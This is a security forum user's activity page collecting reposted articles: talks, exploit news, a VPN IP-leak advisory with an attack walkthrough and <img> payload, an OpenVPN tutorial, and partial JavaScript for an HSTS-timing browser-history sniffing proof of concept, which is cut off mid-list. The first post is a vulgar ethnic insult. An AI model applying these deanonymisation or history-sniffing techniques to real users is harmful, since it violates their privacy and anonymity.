Jump to content

Nytro

Administrators
 View Profile  See their activity

  • Posts

    18785

  • Joined

  • Last visited

  • Days Won

    738

 Content Type 

Everything posted by Nytro

  1. Nytro
    Doresc sa-ti iau neamul de mongoli in pula.
  2. Nytro
    Lista lunga: List of Bug Bounty Programs INTERNATIONAL 426+ OFFICIAL - Bug Bounty Sheet VULNERABILITY LAB
  3. Nytro
    Kevin Breen - DarkComet From Defense To Offense - Identify your Attacker DarkComet is A Remote Access Trojan that has been around for a while. It has been used by script kiddies and nation states alike. It is no longer in active development and It is well documented and understood. So why would you be interested in me talking to you about this bit of malware? Because it has an vulnerability and a public exploit that can tell you a lot about the attackers campaign. How many machines has he infected, where are the infected hosts, what information has he stolen from these machines? Taking the exploit one step further and adding a little imagination and forensics knowledge we can start to identify the attacker himself. Identifying the IP and domain is easy and will give you some info. But what if you could get his daily email address, Facebook details, favourite coffee shop, local library, copy of his CV and if you are really lucky a txt file containing all the credentials for his remote exploit sites and FTP dumps. This presentation is not going to look at the deep technical aspects of the exploit instead it will start with the defensive posture against dark comet and extract some key information from an attack against you. Finishing with a case study showing what information can be extracted from the attacker. More info: https://techanarchy.net/2015/11/darkcomet-hacking-the-hacker/
  4. Nytro
    Researcher Hijacks Android Phone via Chrome Vulnerability By SecurityWeek News on November 13, 2015 Over the past few months, Google has been busy squashing security vulnerabilities in its popular Android mobile operating system, but many remain undiscovered, and some can be easily exploited. Chinese researcher Guang Gong from Qihoo 360 demonstrated at MobilePwn2Own at the PacSec conference in Tokyo how an Android device running the latest version of the operating system can be hijacked by exploiting a JavaScript v8 vulnerability through the Chrome browser. Granted, the security flaw did not reside in the Android OS itself, but devices running on the platform are vulnerable. Gong discovered a JavaScript v8 vulnerability in Chrome for Android that allowed him to install an arbitrary application on the affected device, in this case a BMX Bike game, without requiring any user interaction, PacSec organizer Dragos Ruiu explained in a Google+ post. As long as Chrome is used to navigate to a malicious site an attacker set up, the device can be infected. The exploit was demonstrated on a Google Project Fi Nexus 6 running the latest Android 6.0 Marshmallow build and with all applications up-to-date. The researcher demonstrated that the vulnerability could provide an attacker with complete control of the device, and that successful exploitation does not require chaining multiple vulnerabilities. This one shot exploit was revealed after three-months of work, Ruiu said, but exact details on the security flaw were not publicly disclosed. According to Ruiu, the exploit was tested on other devices as well, and it worked on all of them. Given that the vulnerability is in the JavaScript engine in Chrome, it is believed to affect all Android versions with the latest version of the browser installed. Details on the vulnerability were handed to a Chrome engineer at the conference, Ruiu announced via Twitter. Unfortunately for Gong, his presentation at the conference did not result in an immediate reward for his efforts, though it is likely that Google will reward him for discovering the vulnerability, as the company has a bug bounty program set up for Chrome and Chrome OS. “Since we don't have any lavish prizes for him, I'm bringing him to Canada next year for some skiing/snowboarding at CanSecWest,” Ruiu said, so it seems that a prize will be coming from the PacSec organizers. Google will most likely resolve the vulnerability soon, even if the details on the exploit haven’t been made public as of now. Security researchers have discovered a series of critical Android vulnerabilities this year, including the Stagefright flaw that affected close to a billion devices, and a Stagefright 2 issue suspected to affect devices running all Android versions, starting with the initial release. Sursa: http://www.securityweek.com/researcher-hijacks-android-phone-chrome-vulnerability
  5. Nytro
    [h=1]Funky File Formats [31c3][/h] Funky File Formats Advanced binary tricks Binary tricks to evade identification, detection, to exploit encryption and hash collisions. * artistic binaries - why they are possible, how they work. - quines - polyglots & chimeras - schizophrenic - AngeCryption - hash collisions * challenges and failures ?????????? ?Speaker: Ange Albertini ?EventID: 5930 ?Event: 31th Chaos Communication Congress [31c3] of the Chaos Computer Club [CCC] ?Location: Congress Centrum Hamburg (CCH); Am Dammtor; Marseiller Straße; 20355 Hamburg; Germany ?Language: english ?Begin: Mon, 12/29/2014 + ?License: CC-by
  6. Nytro
    IP leak affecting VPN providers with port forwarding Perfect Privacy, 26. November 2015 Vulnerability “Port Fail” reveals real IP address We have discovered a vulnerability in a number of providers that allows an attacker to expose the real IP address of a victim. “Port Fail” affects VPN providers that offer port forwarding and have no protection against this specific attack. Perfect Privacy users are protected from this attack. This IP leak affects all users: The victim does not need to use port forwarding, only the attacker has to set it up. We have tested this with nine prominent VPN providers that offer port forwarding. Five of those were vulnerable to the attack and have been notified in advance so they could fix this issue before publication. However, other VPN providers may be vulnerable to this attack as we could not possibly test all existing VPN providers. Details about the leak The attacker needs to meet the following requirements: Has an active account at the same VPN provider as the victim Knows victim’s VPN exit IP address (can be obtained by various means, e.g. IRC or torrent client or by making the victim visit a website under the attackers control) The attacker sets up port forwarding. It makes no difference whether the victim has port forwarding activated or not. The IP leak can then be triggered as follows: Victim is connected to VPN server 1.2.3.4 Victim’s routing table will look something like this: 0.0.0.0/0 -> 10.0.0.1 (internal vpn gateway ip) 1.2.3.4/32 -> 192.168.0.1 (old default gateway) Attacker connects to same server 1.2.3.4 (knows victim’s exit through IRC or other means) Attacker activates Port Forwarding on server 1.2.3.4, example port 12345 Attacker gets the victim to visit 1.2.3.4:12345 (for example via embedding <img src=”http://1.2.3.4:12345/x.jpg”> on a website) This connection will reveal the victim’s real IP to the attacker because of the “1.2.3.4/32 -> 192.168.0.1” vpn route. The crucial issue here is that a VPN user connecting to his own VPN server will use his default route with his real IP address, as this is required for the VPN connection to work. If another user (the attacker) has port forwarding activated for his account on the same server, he can find out the real IP addresses of any user on the same VPN server by tricking him into visiting a link that redirects the traffic to a port under his control. Also note that due to the nature of this attack all VPN protocols (IPSec, OpenVPN, PPTP, etc.) and all operating systems are affected. Mitigation Affected VPN providers should implement one of the following: Have multiple IP addresses, allow incoming connections to ip1, exit connections through ip2-ipx, have portforwardings on ip2-ipx On Client connect set server side firewall rule to block access from Client real ip to portforwardings that are not his own. Sursa: https://www.perfect-privacy.com/blog/2015/11/26/ip-leak-vulnerability-affecting-vpn-providers-with-port-forwarding/
  7. Nytro
    dai.s.u.scu.ele@gmail.com "Dai sus cu ele"?
  8. Nytro
    About OpenVPN: If you’re looking for a way to safely and easily access the internet from either your smart phone, laptop or any other device from an untrusted network like some Hotel’s wifi or a restaurant’s. The answer to that question is a virtual private network (VPN) that gives you the ability to roam untrusted networks quite securely and privately like you were on a private and secure network. The traffic then comes out and makes it way to the required destination. Combining this setup with HTTPS connections lets you secure the wireless logins and the transactions that you make. One can also jump past all the geographical restrictions, censorships, shield their location and the unencrypted HTTP traffic from the network that is not trusted. OpenVPN is an open source, fully featured SSL (Secure Socket Layer) VPN answer that comprises on a vast range of configurations. This article will explain to you the way to set up in OpenVPN server on a Droplet and then change access to it from a different operating system like Windows, OS X, iOS or Android. The article will keep configuration and installation process as simple as it can be for these setups. Prerequisites: The only thing that you need beforehand is to have Ubuntu 14.04 Droplet up and running. You will need root access to complete the rest of the article. Step 1 (Install and Configure the Environment of OpenVPN Server) To setup the Server Side for your OpenVPN you need to complete the following step. OpenVPN Configuration We need to update Ubuntu’s repository lists before we install any packages. After doing so we can install Easy-RSA and OpenVPN. The file VPN server configuration must be extracted to /etc/openvpn so that we can add this to our setup. One single command can be used to do this. gunzip –c /usr/share/doc/openvpn/examples/sample-config-files/server.conf.gz > /etc/openvpn/server.conf So when this has been extracted we must open server.conf in text editor. We will edit this by using Vim but you can use whichever text editor you want to. There are a number of changes to be made. You will see a section like this: Edit dh1024.pem to dh2048.pem Doing this will multiply the RSA key length to twice its original size while generating server and client keys. Stay inside server.conf and look for this section Remove the comment push “redirect-gateway defl bypass-dhcp”. By doing this, the VPN server passes on clients’ web traffic to is required destination. The next edit to be done here: Remove the comments so that the last two lines of the above section look like this: This will tell the server too push OpenDNS to the clients that are connected for DNS resolution wherever possible. This will help prevent the leakage off DNS requests outside the VPN connection. It is also necessary to mention the desired DNS resolvers in client devices too. Although OpenDNS is by default used by OpenVPN but you can use whichever DBS services you like. The last area to edit in server.conf is: Remove the comments from the last two lines of the section above so they may look as such: OpenVPN runs root user by default and in turn has full access to the system. OpenVPN will be restricted by us to just user nobody and group nogroup. This user has no ability to login and is simply just an unprivileged user. This user is also kept to run untrusted applications like web-facing servers. Changes must be saved and Vim must be closed now. Packet forwarding This setting is a sysctl setting and what it does is that it tells the server’s kernel to send the traffic from the client devices out through the internet. If not done so, the traffic will stop at the server. Packet forwarding should be enabled at runtime by this command: This should be made permanent so that the server may still forward traffic after the system reboots. At the top of the sysctl file, there will be: Uncomment net.ipv4.ip_forward. It should be like: Save what changes you have made and then exit. Uncomplicated Firewall (ufw) It’s a front end for iptables and setting it up is quite easy. It’s already present in Ubuntu 14.0.4 by default so all we have to do is configure some settings and rules and just switch the firewall on. Firstly set ufw to all SSH. In the command prompt ENTER : This article will use OpenVPN instead of UDP, ufw must be set such as to allow UDP traffic over port 1194. Now we have to set ufw forwarding policy. We’ll edit ufw’s primary file for this. Look for DEFAULT_FORWARD_POLICY=”DROP” and change it to DEFAULT_FORWARD_POLICY=”ACCEPT”. After doing this we will add some more rules for translation of network address and masquerading IPs of clients that are connected. Now make the top of the before.rules file look like it is below. The area in red for OPENVPN RULES will be added next: After the changes have been made, we can enable it. Go to command prompt: Doing so will return this prompt: Answer y. The result will then be: Now we’ll check ufw’s firewall status: Entering this command should return something like this: Step 2 – Creating A Certificate Authority and Server-Side Certificate And Key Certificates are used by OpenVPN to encrypt files. Configuring and Building the Certificate Authority Now it’s time to generate our own Certificate Authority (CA) and generate certificates and keys for the OpenVPN server. Bidirectional Authentication is supported based on certificated is supported by OpenVPN which means that the client and the server must authenticate the certificate before trust is mutually established between them. To do this we will use Easy RSA’s scripts that we copied earlier. Firstly we copy the Easy RSA generation scripts. Then the key storage directory should be made: There is a variables file that can be edited to create certificates exclusive to our business, person or whatever entity of our choice. This information will be copied to the keys and the certificates, later helping in identifying keys. The variables that are marked below in red should be changed so to what you prefer. In the very same vars file we also need to edit this one single line below. Just for the sake of simplicity we are using server as the key name. If you intend to use a different name then you’re going to need to update the OpenVPN configuration files that reference server.key and server.crt. Now we need to generate the Diffie-Hellman parameter which will take several minutes. Now we’ll me changing directories so that we can work directly out of where we moved the Easy RSA’s scripts to in STEP 2. Now we’ll be initializing the Public Key Infrastructure. Special attention is needed to be paid to the dot (.) and the space in front of. /vars command. This tells the current directory where we’re working. The output that is generated form the above command is shown below. There is nothing yet that has been generated y us in the keys directory so the warning is nothing to get alarmed about. Now we’ll make way for our new keys by clearing out all the old or possibly any existing keys that may be there in the directory: This last command invokes an interactive OpenSSL command and builds the certificate authority (CA). The output will ask you to confirm the variables that were entered before into the Easy RSA variable file. Just press ENTER to pass through every prompt. If you feel like something should be changed then you can do that from within the prompt. Generate a Certificate and Key for the Server We’re still working form /etc/openvpn/easy-rsa , now enter the command to build the key for the server. The server marked in red is the export KEY_NAME variable that we set in Easy RSA’s vars file in STEP 2. Same output is generated when we have the command. /build-ca , you can press ENTER again to confirm every line of the distinguished name. This time however you’ll see two addition prompts: Both spaces should be left blank, just press ENTER to skip each one. Two queries at the end require a positive (y) response: Lastly the above prompt should complete with: Move the Server Certificate and Keys OpenVPN is set by default to see the certificate, keys and the server’s CA in /etc/openvpn. Now we need to copy the required files into the proper location so that OpenVPN can easily access the files for further usage. If your copy was successful, you can verify it by: Now you should see the certificate and key files to the server in the desired location. Currently at this stage, the OpenVPN is up and ready to go. You should now start t and check the status. The command that you should see in return would be like this: Congratulations! You have successfully configured your OpenVPN server and it should be operational. If for some reason the status message says that the VPN is not running then you should take a closer look at your /var/log/syslog file for any bugs or errors such as: He error mentioned above indicates that server.key was not yet copied into /etc/openvpn correctly. You need to re-copy the file again to the directory and follow the procedure to try again and convert your OpenVPN to its operational state. Step 3 – Generate Certificates and Keys for Clients Up till now we have installed and configured the OpenVPN server. We created a Certificate Authority and created a certificate and keys just for the server. This step tells us how we use the server’s CA to make certificates and keys for every client device that is going to be connected to the VPN. All of these files will then be installed on to the client devices such as smartphones or laptops later on. Key and Certificate Building Ideally its required that each client connecting to the VPN have its own certificate and key. This is preferred to generating a general certificate and key for all the clients that are connected to the VPN. It should be noted that OpenVPN by default does not allow connections from clients using the same certificate and key to the server simultaneously. This step should be completed if you intend to create separate authentication credentials for each device that is to be connected to the VPN. Change the name client1 under to something different like client2 or iphone2. If we give every device its separate credentials then it can be individually deactivated at the server side when needed. The rest of the article shall use client1 as the example client device’s name. Now we’re going to build a key for the client1 as we did for the server. The working directory that you should be in is /etc/openvpn/easy-rsa . As with the case of the server you’ll be asked again to confirm or change the distinguished name variables and just like before these two should be left blank. Press ENTER to accept the default settings. Just like before, these two confirmations will need a (y) response at the end of the build process: If the key build succeeds then the output just like before will be: The example client configuration needs to be copied to the Easy-RSA key directory. This example configuration file shall be used as a template that will be downloaded to the client devices and then be edited. While copying we’ll be changing the name of the example file form client.conf to client.ovpn because the .ovpn is the extension that all the clients will expect to use. cp /usr/share/doc/openvpn/examples/sample-config-files/client.conf /etc/openvpn/easy-rsa/keys/client.ovpn This section can be repeated for each client by replacing client1 with the right client name. Transferring Certificates and Keys to Client Devices Remember from the steps above that we created the keys and certificates and the directory in which we stored them after they were made was /etc/openvpn/easy-rsa/keys. For every client connected we must transfer the client profile template, certificate and key files to a folder either on our local computer or another client device. In this article the client1 device requires its keys and certificate that are located on the server in: The ca.crt and client.ovpn for all the clients stay exactly the same. These two files should also be downloaded. It should be noted that the ca.crt file is located in a different directory than others. The applications that are used to complete this transfer will solely depend on the choice that you make and the operating system on the device. You want the application to use SFTP (SSH file transfer protocol) or SCP (Secure copy protocol) on the backend. This will be useful as it will copy all the client’s VPN authentication files over an encrypted connection. At the end you must check if the following four files are present on your client device: client1.crt client1.key ovpn crt Step 4 – Creating a Unified OpenVPN Profile for Client Devices There are a number of methods that can be used to manage the client files but the easiest one is using a unified profile. This is done by editing the client.ovpn template file and including in it the server’s CA and the client’s key and certificate. Once all the files are merged in to one then only this single client.ovpn is needed to be imported in the client’s OpenVPN application. What we will do is that we will create a single profile for our client1 device on the computer to which we downloaded all the client files. This computer can itself be either a client or just another temporary work area to merge the authentication files. The client.ovpn template file should be renamed and duplicated. The ‘how you do this’ depends upon the operating system of your local computer. It should be noted that the name of the client.ovpn duplicated file need not be related to the client device. The OpenVPN application on the client-side will use the file name as an identifier for the VPN connection itself. What you should do is that you should duplicate client.ovpn to whatever nametag you want the VPN to be in your operating system. In this article we shall name the connection GeekEasier so GeekEasier.ovpn shall be the file name used from now on. Once it is named then we must open GeekEasier.ovpn in a text editor. You can use whichever text editor you prefer to use. The first area which you need to pay attention to is the IP address of your droplet. Almost near to the top of the file, we need to change my-server-1 to your VPN’s IP. After doing this we need to find the area that is shown below and then uncomment user nobody and user nogroup just like we did before in server.conf in STEP 1. This should be noted that this does not apply to the Windows operating system so you can skip it. It should like down below: The area that is below needs the three lines shown to be commented so that we can instead include the key and certificate directly in the GeekEasier.ovpn file. After you’re done it should look like this: Now we need to merge all the individual files into one single unified file. The contents of the ca.crt, client1.crt, and client1.key are pasted directly into the .ovpn profile using the XML-like syntax. The XML at the end should take this form: Once finished the end of the file should be the same as this abbreviated example: The client1.crt has a bit of extra information in it and it’s totally fine to just add the file. Save the changes that you have made and exit. We now have a unified OpenVPN client profile to configure our client1 with. Step 5 – Installing the Client Profile The thing that needs to be discussed now is how to install a client VPN profile on Android, iOS, OS X, and Windows. All of these client instructions are independent of others so you can skip to whichever one applies to you. This should be remembered that the connection will be called by the same name that you named the .ovpn file. In our example since the file name was GeekEasier.ovpn so the connection will be called GeekEasier. Windows Installing The OpenVPN client application for Windows can be downloaded from OpenVPN’s Downloads page. You have to choose the right version from the website for your Windows. This should be noted that administrative rights are required to install OpenVPN on Windows. After you have installed OpenVPN, copy the unified GeekEasier.ovpn profile to: When you open OpenVPN then it will automatically see the profile and make it available. OpenVPN requires that it be run as an administrator each time it is to be used even by the administrative accounts. Now to save the hassle of having to right-click and selecting Run as administrator every time you use VPN, you can preset this but the condition is that it must be done from an administrator account. This means that standard users need to enter the admin password to use OpenVPN. But if standard users do not have administrative rights then OpenVPN cannot connect to the server properly thus administrative privileges are quite necessary. To set the OpenVPN application to always run as the administrator just right-click on the shortcut icon and go to Properties. At the bottom of the Compatibility tab there will a button saying Change settings for all users, click on it. A new window will open; check the Run this program as an administrator box. Connecting Every time that you launch the OpenVPN GUI, Windows will ask you whether you want this progam to make changes to your computer or not. Click Yes. Executing the OpenVPN client application just puts the applet in the system tray so that the VPN can be connected and disconnected when needed but it does not make a VPN connection per se. Now that you have started OpenVPN, make a connection by moving the cursor down to the system tray applet and then by right-clicking on the applet icon of OpenVPN present there. Doing so will open the context menu. Select GeekEasier from the top of the menu which is basically our GeekEasier.ovpn profile and Connect to it. OSX Installing There is an open source VPN client for Mac OS X known as Tunnelblick. To download the latest disk image of this client just go to Tunnelblick Downloads page. After it has been downloaded, double click on the .dmg file and follow the steps to install. Almost near to the end of the installation process, Tunnelblick will ask you whether you have any configuration files or not. Answering it as No is easier and then it will finish. We have to add the client profiles and to do that we must open a finder window and then double click on GeekEasier.ovpn. To install the client profile we need administrative rights. Connecting Launch the Tunnelblick by double-clicking on Tunnelblick in the Applications folder. Once you have launched Tunnelblick, you will now be able to see a Tunnelblick icon in the menu bar at the top right of the screen that is used for controlling connections. Click on the icon, when the Connect menu opens you need to select the right connection. Select GeekEasierand connect to the VPN. IOS Installing We need to go to the iTunes App Store and search for and install OpenVPN Connect, the official iOS OpenVPN client application. Now we need to transfer our iOS client profile onto the device and to that we must connect the iOS device directly to the computer. Completing the transfer will be outlined here. From the computer open iTunes and click iPhone>apps. To the bottom of the File Sharing section click on the Open VPN app. The window to the right is blank, it is OpenVPN Documents and is used for sharing files. Now drage the .ovpn dile to the OpenVPN documents window. Now all you have to do is launch the app on the iPhone. You will get a notification that a new profile is ready to be imported. Tap the plus sign in green to import it. Connecting Now the OpenVPN app is ready to use with the new profile. The connection can be started by moving/sliding the Connect button to On position. If you want to disconnect it then move/slide the button to Off position. It should be noted that the VPN button in the Settings can never be used to connect to the VPN. If you try to do so, you will get a notice to connect to the OpenVPN app. Android Installing For android all we need to do is that we need to open Google Play Store. Search for Android OpenVPN and install the official Android client application. Copying the .ovpn file is not that hard. All we need to do is that we need to connect out Android device to the computer and then copy the file over to it. Similarly if you have a SD card reader, you can simply remove the memory card from the devoce and copy the .ovpn file onto it and then put the card back into the device. Now you will start the OpenVPN application and go to the menu to import the profile. Then go to the location where the profile has been saved. The screenshot uses the SD card location (/sdcard/download/ ) and from there select the file. The application will note that the profile has been imported. Conecting For connecting to the VPN just tap the Connect button. The application will prompt to ask whether you trust the OpenVPN application. Tap OK to start the connection. If you want to disconnect from the VPN, just go back to the OpenVPN application and choose Disconnect. Step 6 – Testing Your VPN Connection Once you have installed everything, a simple check can be made to tell whether everything is working properly or not. Without enabling a VPN connection, open a browser and go to DNSLeakTest. The website will return you an IP address that is assigned to you by your ISP (Internet Service provider) and also as you seem to the entire world as well. If you want to check your DNS stings from the same website, click on Extended Test and it will tell you which DNS server is being used by you. Now you will connect the OpenVPN client to the Droplet’s VPN and then refresh your browser. Now an IP address should appear that will be completely different from the one that was shown earlier. Now the entire world will recognize you by this IP address. Now again, DNSLeakTest’s Extended Test will check your DNS settings and then later confirm if you are now using the DNS resolvers pushed by your VPN. Congratulations to you! You can now securely traverse the internet protecting your cyber identity, location and traffic from censors and snoopers. Sursa: http://geekeasier.com/set-up-an-openvpn-server-on-ubuntu/3584/
  9. Nytro
    Thanks. Da, e extinsa. Nu se vand/cumpara sau ofera gratuit astfel de lucruri.
  10. Nytro
    Windows Phone Internals 1.0 - primul toolkit pentru root-area telefoanelor Lumia Aurelian Mihai - 26 nov 2015 Prin eforturile unui hacker foarte activ în comunitatea XDA Developer, utilizatorii de telefoane Lumina cu sistem Windows Phone vor putea de acum s?-?i personalizeze versiunea de OS instalat? la fel ca utilizatorii de Android. Astfel, cu Windows Phone Internals 1.0 po?i debloca bootloader-ul implicit de pe telefoanele Lumia ?i aplica procedeul de Root, ob?inând acces la m?runtaiele sistemului de operare ?i chiar posibilitatea de a instala ROM-uri Windows Phone neoficiale, modificând sau extinzând func?ionalitatea de baz? a dispozitivului. Potrivit dezvoltatorului cunoscut dup? pseudonimul Heathcliff, software-ul suport? deja ?majoritatea versiunilor de Windows Phone 8.1 ?i Windows 10 Mobile„. Desigur, ca ?i în cazul procedeului similar folosit pentru modificarea dispozitivelor cu Android, interven?iile aduse de utilizatori pot duce la pierderea garan?iei asigurate de produc?tor, în eventualitatea în care modific?rile f?cute duc la defectarea dispozitivului. Pentru moment, utilitatea kit-ului Windows Phone Internals este limitat?, neexistând înc? ROM-uri Windows Phone personalizate disponibile pentru instalare. Îns? lucrurile se vor schimba cu siguran?? dup? ce membrii comunit??ii XDA vor apuca s? experimenteze cu noul software. Sursa: Windows Phone Internals 1.0 - primul toolkit pentru root-area telefoanelor Lumia Imi plac articolele celor de la go4it.
  11. Nytro
    Nu stiu daca s-a mai postat: https://crowdshield.com/bug-bounty-list.php
  12. Nytro
    Remotely Sniffing Browser History via XSS Using HSTS + CSP This is a PoC/demo and on how to remotely "sniff" user's browsing history via Cross-Site Scripting (XSS) vulnerabilities via HSTS/CSP timing attacks. All credits for the original exploit go to @bcrypt which can be downloaded here:https://github.com/diracdeltas/sniffly. The below source code allows for remote exploitation of clients and remote dumping of positive matches back to a specified web browser. Source code: /** * @<a href="https://rstforums.com/forum/members/file/" target="_blank">file</a>overview This file loads a bunch of HSTS domains and times how long it * takes for them to be redirected from HTTP to HTTPS. Based on that, it * decides whether the domain is a previously-noted HSTS domain or not. * @author yan <yan@mit.edu> * @license MIT * @version 0.2.0 */ // Timing in milliseconds above which a network request probably occurred. // TODO: Determine this dynamically from the distribution of response times. var TIMING_UPPER_THRESHOLD = 5; // Timing in milliseconds below which a request time is probably a measurement // fluke. var TIMING_LOWER_THRESHOLD = -10; // Timing allowance for a synchronous image load, which we use to confirm // positive results in Chrome. var TIMING_CONFIRM_THRESHOLD = 20; // Use an arbitrary static preloaded HSTS host for timing calibration var BENCHMARK_HOST = 'http://torproject.org/'; // Initial timing calibration offset. This gets recalculated every other fetch. var OFFSET = 0; var visitedElem = document.getElementById('visited'); var notVisitedElem = document.getElementById('not_visited'); var disclaimer = document.getElementById('disclaimer'); var isFirefox = (window.navigator.userAgent.indexOf('Firefox') !== -1); var visited = []; // list of hosts that are potentially visited // Edit this based on scraper results. var hosts = ['http://www.npmjs.com/', 'http://savecrypto.org/', 'http://www.xoom.com/', 'http://atom.io/', 'http://angel.co/', 'http://vine.co/', 'http://www.oculus.com/en-us/', 'http://www.hackerrank.com/', 'http://noscript.net/', 'http://www.sixt.com/', 'http://www.crazydomains.com.au/', 'http://www.yola.com/', 'http://www.mailerlite.com/', 'http://giustizia.it/', 'http://notepad-plus-plus.org/', 'http://www.unfranchise.com.tw', 'http://www.ing-diba.de/', 'http://www.adreactor.com/', 'http://meduza.io/', 'http://www.wealthfront.com/', 'http://mail.live.com/default.aspx', 'http://muabannhanh.com/', 'http://upjers.com/', 'http://www.rabobank.nl/', 'http://www.ing.nl/', 'http://www.kickstarter.com/', 'http://creativemarket.com/', 'http://pinterest.com/', 'http://www.ashampoo.com/en/usd', 'http://www.sofort.com/', 'http://www.xing.com/', 'http://podio.com/', 'http://www.servis24.cz/', 'http://www.galeria-kaufhof.de/', 'http://www.kocpc.com.tw/', 'http://www.commbank.com.au/', 'http://recyclix.com/', 'http://www.usajobs.gov/', 'http://briian.com/', 'http://www.vultr.com/', 'http://about.gitlab.com/', 'http://www.tanga.com', 'http://wanelo.com/', 'http://herokuapp.com/', 'http://unsplash.com/', 'http://ria.com/', 'http://www.missguided.co.uk/', 'http://lever.co/', 'http://venmo.com/', 'http://ello.co/', 'http://www.template.net/', 'http://www.digid.nl/', 'http://qiwi.ru/', 'http://www.instacart.com/', 'http://www.touchofmodern.com/', 'http://roadtrippers.com/', 'http://www.freshdesignweb.com/', 'http://www.fnb.co.za', 'http://www.graphicsprings.com/', 'http://www.patreon.com/', 'http://hotwords.com/', 'http://www.cryptsy.com/', 'http://vitalsource.com/', 'http://pass.yandex.ua/', 'http://www.yammer.com/', 'http://ixquick.com/', 'http://sbis.ru/', 'http://www.ecosia.org/', 'http://www.freecycle.org/', 'http://pass.yandex.by/', 'http://www.mailjet.com/', 'http://www.yugster.com/', 'http://tinypng.com/', 'http://nest.com/', 'http://kat.cr/', 'http://www.practo.com/', 'http://c9.io/', 'http://beget.ru/', 'http://startpage.com/', 'http://www.bet-at-home.com/', 'http://tripcase.com/', 'http://www.douglas.de/', 'http://yande.re/post', 'http://www.bookbub.com/', 'http://www.swarmapp.com/', 'http://www.woorank.com/', 'http://paytm.com/', 'http://www.payza.com/', 'http://www.instapaper.com/', 'http://wikitech.wikimedia.org/', 'http://www.ipko.pl/', 'http://www.straighttalk.com/wps/portal/home', 'http://heroku.com/', 'http://www.privat24.ua', 'http://zimbra.free.fr/', 'http://www.blueapron.com/', 'http://secure.logmein.com/', 'http://adblockplus.org/', 'http://www.udemy.com/', 'http://tribalwars2.com/', 'http://sparkfun.com/', 'http://www.sparebank1.no/bank/', 'http://spotify.com/', 'http://creditkarma.com/', 'http://www.paxum.com/payment/phrame.php', 'http://jamberrynails.net/', 'http://fotolia.com/', 'http://stacksocial.com/', 'http://www.cms.gov/', 'http://iconfinder.com/', 'http://www.expireddomains.net/', 'http://navalny.com/', 'http://privatbank.ua/', 'http://www.englishforums.com/', 'http://www.hushmail.com/', 'http://www.pingdom.com/', 'http://www.zomato.com/', 'http://icook.tw/', 'http://www.office.com/', 'http://groupme.com/', 'http://wikimedia.org/', 'http://dapulse.com/', 'http://www.cuelinks.com/', 'http://www.attracta.com/', 'http://www.outlook.com/owa/', 'http://www.dnb.no/', 'http://www.lotterypost.com/', 'http://bitcoin.org/', 'http://href.li/', 'http://skandiabanken.no/', 'http://foursquare.com/', 'http://www.usa.gov/', 'http://www.bitgold.com/', 'http://quizlet.com/', 'http://www.alipay.com', 'http://yadi.sk/', 'http://duckduckgo.com/', 'http://www.dashlane.com/', 'http://www.ozbargain.com.au/', 'http://www.ricardo.ch/', 'http://www.fakku.net/', 'http://www.mturk.com/', 'http://www.national-lottery.co.uk/', 'http://www.onthebeach.co.uk/', 'http://www.icloud.com/', 'http://www.zenefits.com/', 'http://code.org/', 'http://www.chapters.indigo.ca/', 'http://www.dntx.com/', 'http://www.slsp.sk/', 'http://www.raise.com/', 'http://cinematrix.net/', 'http://www.baifubao.com/', 'http://blogun.ru/', 'http://videostripe.com/', 'http://typekit.com/', 'http://www.splitwise.com/', 'http://www.eobot.com', 'http://login.microsoftonline.com/', 'http://www.xero.com/', 'http://www.rakuten-sec.co.jp/', 'http://www.creativecow.net/', 'http://sweb.ru/', 'http://www.seroundtable.com/', 'http://www.hipchat.com/', 'http://subscribe.free.fr/', 'http://topvisor.ru/', 'http://www.avforums.com/', 'http://www.travelodge.co.uk', 'http://opendns.com/', 'http://www.pcloud.com/', 'http://www.akiba-online.com/', 'http://www.instamojo.com/', 'http://www.commsec.com.au/', 'http://assembla.com/', 'http://www.bukalapak.com/', 'http://www.docusign.net/', 'http://www.hotslogs.com/', 'http://www.consorsbank.de/home', 'http://www.searchlock.com/', 'http://madmimi.com/', 'http://www.bawagpsk.com/BAWAGPSK/PK', 'http://www.crunchbase.com/', 'http://www.maketecheasier.com/', 'http://session.wikispaces.com/1/auth/auth', 'http://witkit.com/', 'http://pixabay.com/', 'http://www.mygreatlakes.org/', 'http://ncore.cc/', 'http://www.hpconnected.com/', 'http://payeer.com/', 'http://join.me/', 'http://www.gamefly.com/', 'http://bitcoinwisdom.com/', 'http://land.nrw/', 'http://www.saddahaq.com/', 'http://www.quantcast.com/', 'http://www.behance.net/', 'http://xapo.com/', 'http://fabric.io/', 'http://www.dollarphotoclub.com/', 'http://mandrillapp.com/', 'http://moodle.org/', 'http://imp.free.fr/', 'http://www.pebble.com/', 'http://www.periscope.tv/', 'http://generalassemb.ly/', 'http://login.szn.cz/', 'http://www.lyft.com/', 'http://www.mql5.com/', 'http://www.wrike.com/', 'http://www.fanfiction.net', 'http://www.box.com/', 'http://www.test.de/', 'http://calendar.sunrise.am', 'http://www.djangoproject.com/', 'http://qiwi.com/', 'http://adlure.net/', 'http://www.stitchfix.com/', 'http://www.bankofthewest.com/', 'http://roem.ru/', 'http://www.carthrottle.com/', 'http://pass.yandex.kz/', 'http://gumroad.com/', 'http://www.hosteurope.de/', 'http://www.canva.com/', 'http://www.usbank.com/', 'http://evernote.com/', 'http://secure.actblue.com/', 'http://myspace.com/', 'http://www.jbhifi.com.au', 'http://www.physicsforums.com/', 'http://www.abnamro.nl/nl/index.html', 'http://twittercommunity.com/', 'http://wikileaks.org/', 'http://www.chmail.ir/', 'http://mail.ru', 'http://www.victoriassecret.com/', 'http://www.firstnational.com/', 'http://www.dominos.co.uk/', 'http://www.indiblogger.in/', 'http://www.zendesk.com/', 'http://www.hypovereinsbank.de/', 'http://www.openshift.com/', 'http://buffer.com/', 'http://what.cd/', 'http://hide.me/', 'http://trello.com/', 'http://www.comodo.com/', 'http://twilio.com/', 'http://www.alternate.de/', 'http://telegram.org/', 'http://www.manageengine.com/', 'http://unsw.edu.au/', 'http://www.flipkey.com/', 'http://www.popads.net/', 'http://myworkday.com/', 'http://www.meneame.net/', 'http://popcorntime.io/', 'http://iqoption.com/', 'http://www.tumblr.com/', 'http://www.reddit.com/', 'http://www.petfinder.com/', 'http://www.messenger.com/', 'http://www.digitalpoint.com/', 'http://www.blibli.com/', 'http://namu.wiki/', 'http://launchpad.net/', 'http://www.blognone.com/', 'http://www.ing.be/en/retail/Pages/index.aspx', 'http://acrobat.com/', 'http://mbank.pl/', 'http://www.fasttech.com/', 'http://www.post.ch/de', 'http://gyazo.com/', 'http://packagecontrol.io/', 'http://vimeo.com/', 'http://www.airbnb.es/', 'http://www.airbnb.it/', 'http://www.airbnb.fr/', 